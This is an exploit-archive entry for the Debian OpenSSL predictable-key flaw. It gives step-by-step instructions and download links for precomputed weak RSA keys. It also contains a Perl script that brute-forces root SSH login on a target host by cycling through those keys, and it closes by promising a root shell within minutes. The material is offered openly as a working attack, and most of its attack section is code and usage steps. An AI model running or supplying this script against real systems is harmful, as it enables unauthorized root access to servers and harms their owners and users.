54 lines
No EOL
1.7 KiB
Text
54 lines
No EOL
1.7 KiB
Text
the debian openssl issue leads that there are only 65.536 possible ssh
|
|
keys generated, cause the only entropy is the pid of the process
|
|
generating the key.
|
|
|
|
This leads to that the following perl script can be used with the
|
|
precalculated ssh keys to brute force the ssh login. It works if such a
|
|
keys is installed on a non-patched debian or any other system manual
|
|
configured to.
|
|
|
|
On an unpatched system, which doesn't need to be debian, do the following:
|
|
|
|
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
|
|
***E-DB Note: Mirror ~ https://github.com/g0tmi1k/debian-ssh***
|
|
|
|
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
|
|
|
2. Extract it to a directory
|
|
|
|
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
|
|
Bits, generated on an upatched debian (this is the key this exploit will
|
|
break)
|
|
|
|
4. Run the perl script and give it the location to where you extracted
|
|
the bzip2 mentioned.
|
|
|
|
#!/usr/bin/perl
|
|
my $keysPerConnect = 6;
|
|
unless ($ARGV[1]) {
|
|
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
|
|
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
|
|
print "By mm@deadbeef.de\n";
|
|
exit 0;
|
|
}
|
|
chdir($ARGV[0]);
|
|
opendir(A, $ARGV[0]) || die("opendir");
|
|
while ($_ = readdir(A)) {
|
|
chomp;
|
|
next unless m,^\d+$,;
|
|
push(@a, $_);
|
|
if (scalar(@a) > $keysPerConnect) {
|
|
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
|
|
".$_ } @a)." ".$ARGV[1]);
|
|
@a = ();
|
|
}
|
|
}
|
|
|
|
5. Enjoy the shell after some minutes (less than 20 minutes)
|
|
|
|
Regards,
|
|
Markus Mueller
|
|
mm@deadbeef.de
|
|
|
|
# milw0rm.com [2008-05-15] |